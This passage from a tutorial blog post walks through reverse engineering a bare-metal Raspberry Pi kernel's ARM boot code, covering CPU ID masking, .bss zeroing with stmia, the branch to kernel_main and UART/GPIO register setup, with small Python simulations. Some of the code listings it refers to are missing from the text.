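    for core in range(4):
        mpidr = 0x80000F00 | core  # made-up upper bits, real CPU ID in the low bits
        print(hex(mpidr), "->", cpu_id(mpidr))
```

Whatever value the boot code then compares against, the point of the mask is that the comparison only ever sees a number between 0 and 3.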

To compare different invocations of the mrc and coprocessors it's a good idea to scratch around other people's kernels to see what they are doing with this instruction. Here's an example I found on github:

from raspberrypi/boards/cpuid/vector.s

here's what it does with it in a file called cpuid.c:

Clearly this is to determine the board type. I'm not delving into too much detail about the specific value we are checking and what it means; to find this out I probably need to dig a little deeper in the board data sheets, so the jury is still out on hard confirmations about what opcode 5 does. Nonetheless we can be pretty sure this is to make sure our code runs properly on the right board. Moving on!

Reverse Engineering a basic C run time setup

The next snippet of code looks like this:

The mov sp instruction points the stack pointer at 0x8000. Afaik there's some flexibility in which value you use, but it might also depend on your board type. After that we see a ldr instruction; here is the definition of this operation according to the documentation:

The LDR pseudo-instruction loads a register with either:

a 32-bit constant value
an address.

- http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0041c/Babbfdih.html

This code is pretty straight forward then; it loads the addresses of where the labels __bss_start and __bss_end are into registers r4 and r9 respectively. It then 0's out the values of registers r5-r8. After all this it issues a b 2f instruction, which means it will branch unconditionally to label 2 and start executing there. We can confirm this by looking at the assembler code for this:

The instruction at 802c reads b 8034 <__start+0x34>, which shows that it will branch to the cmp r4,r9 instruction, which according to boot.S is the first instruction under label 2. After the comparison it does a conditional branch based on the result: as long as r4 has not yet reached r9 it repeats the loop by branching back to _start+0x30, which has this instruction:

stmia r4!,{r5-r8}

The stm instruction stores the values of the registers listed in the braces (in our example all the registers from r5 to r8, a total of 16 bytes) contiguously in memory, starting at the address pointed to by r4. The ia suffix stands for "increment after": the address is incremented after each register is stored. The exclamation suffix means the final address is written back to r4. This allows us to slam 16 bytes into memory at a time.
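To see the whole loop in one place, here's a rough simulation of it over a plain byte buffer. It assumes the loop keeps going while r4 is below r9 and that the region is a multiple of 16 bytes long; both are assumptions on my side, and the buffer and addresses are made up. zero_bss is a hypothetical helper name.

```python
def zero_bss(memory: bytearray, bss_start: int, bss_end: int) -> int:
    """Simulate the stmia loop; returns how many 16-byte stores were issued."""
    r4, r9 = bss_start, bss_end
    zeros = bytes(16)  # r5-r8: four 32-bit registers, all holding 0
    stores = 0
    while r4 < r9:  # cmp r4, r9 and branch back while r4 is below r9 (assumed)
        memory[r4:r4 + 16] = zeros  # stmia r4!, {r5-r8}
        r4 += 16  # the "!" writes the advanced address back into r4
        stores += 1
    return stores


# Made-up 64-byte "RAM" full of 0xff, with a pretend .bss from 16 to 48.
memory = bytearray(b"\xff" * 64)
count = zero_bss(memory, 16, 48)

if __name__ == "__main__":
    print(count, memory.hex())
```

Only the bytes between the two labels get wiped; everything on either side keeps its old contents, which is exactly what you want when the .bss sits between other sections.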

What's happening here may seem odd, but it's pretty standard practice for cleaning out memory sections in order to prep a C run time. Here are some examples from other people's raspberry pi kernels. This one is also cleaning out the bss; you can see it does some other C/C++ run time prep stuff too:

The code in the section labeled "Initialize the .data section" copies stuff out of memory using a ldrlo instruction, which reads 4 bytes from the address [r1] (which we can see is initialized as __data_init_start), and then stores it to the memory address [r2] immediately after using the strlo operation. Very similar structure to what we are doing. This post called "Building Bare metal ARM systems with GNU" shows some more: https://www.embedded.com/design/mcus-processors-and-socs/4026075/Building-Bare-Metal-ARM-Systems-with-GNU-Part-2

Okay so let's say we are done setting up our C runtime. The next thing boot.S does is branch to the kernel like so:

ldr r3,=kernel_main
blx r3

The blx instruction is pretty important: it means Branch with Link and Exchange. It saves the return address in the link register and transfers control to the kernel's main function.

Reverse Engineering Basic UART I/O initialization

Once it breaks into the kernel it passes it a couple of arguments, one of which is the location of the atags structure in memory. I will get into that perhaps in a later post, but what I want to focus on here is how the uart_init and kernel main functions look at assembler level.

Here's the kernel main:

Let's break this down. The first instruction is a push to preserve the r4 and link registers. According to the sources I have here this is done because the r4 register holds the atags start address which is passed to the kernel on start. What happens then is the kernel branches immediately to uart_init, which looks like this:

Doesn't look like too much of a monster; all it does here is essentially shuffle some values around. The first instruction puts a 0 into r1, which is being used as a place holder for 0 and clears it for later use as well. The next two instructions construct the base value for the GPIO reference structure: it does this by first putting 0x1000 in the bottom half of the r3 register and then using a movt to stick 0x3f20 into the top half. Here's the documentation on the movt instruction:

Move Top. Writes a 16-bit immediate value to the top halfword of a register, without affecting the bottom halfword.

Syntax

MOVT{cond} Rd, #immed_16

Pretty useful stuff, it gives you some flexibility in shuffling around byte values. So it makes r3 hold the value 0x3f201000 which we know from the code is the UART_BASE address:

Then it sets up another offset in the GPIO enum, but this one using r1 (which points to GPIO_BASE via another movt). It also moves a value into r2, but I suspect this is only going to make sense later on (let's skip it for now). With those two pointers set up it performs a str instruction using the r0 value, which is 0, and writes it to r3+0x30, which is UART_CR. If we look at the code again this is exactly what it's doing, just setting the memory address pointed to by UART_CR to 0:

Same goes for the r1 str operation of course. We know r1 points to GPIO_BASE, and the str writes to r1+0x94 which is GPPUD.
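The address arithmetic from this section fits in a few lines if you want to double check it. This is only a sketch of the bit shuffling; it assumes the low half of GPIO_BASE is 0x0000 (I only know its top half comes from a movt), and movw_movt is a hypothetical helper name.

```python
def movw_movt(low16: int, high16: int) -> int:
    """Combine a low halfword and a movt-style top halfword into a 32-bit value."""
    return ((high16 & 0xFFFF) << 16) | (low16 & 0xFFFF)


UART_BASE = movw_movt(0x1000, 0x3F20)  # bottom half 0x1000, top half 0x3f20
GPIO_BASE = movw_movt(0x0000, 0x3F20)  # assumption: low half is zero

UART_CR = UART_BASE + 0x30  # target of the str through r3
GPPUD = GPIO_BASE + 0x94  # target of the str through r1

if __name__ == "__main__":
    print(hex(UART_BASE), hex(UART_CR), hex(GPIO_BASE), hex(GPPUD))
```

When you reverse the rest of the kernel, the same trick works in the other direction: take the address a str ends up writing to, subtract the base, and look the offset up in the enum.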

Okay the rest of the kernel operations are no different to this really they just perform writes to different offsets. I think if you'd like to git gud at reverse engineering these kinds of functions try reversing the rest of the kernel and then looking for some other kernels that do something like this and see if you can reverse engineer out how they do it and where. Have fun!

Reading and references

Bare bones RaspberryPi OS https://wiki.osdev.org/Raspberry_Pi_Bare_Bones
Vector.s https://github.com/dwelch67/raspberrypi/blob/master/boards/cpuid/vectors.s
https://www.techrepublic.com/blog/european-technology/build-your-own-os-using-the-raspberry-pi/
https://jsandler18.github.io/
http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0068b/CIHEEIDJ.html
http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0464e/CHDGECEI.html
http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0360f/CHDGIJFB.html
C0 Main ID Register http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0360f/I65012.html
Load Register Byte http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0802a/LDRB_imm.html
BCM2835 Specifications https://www.raspberrypi.org/documentation/hardware/raspberrypi/bcm2835/README.md
ARM11 Tech reference manual http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0301h/index.html
c0 Coprocessor Registers http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0464f/index.html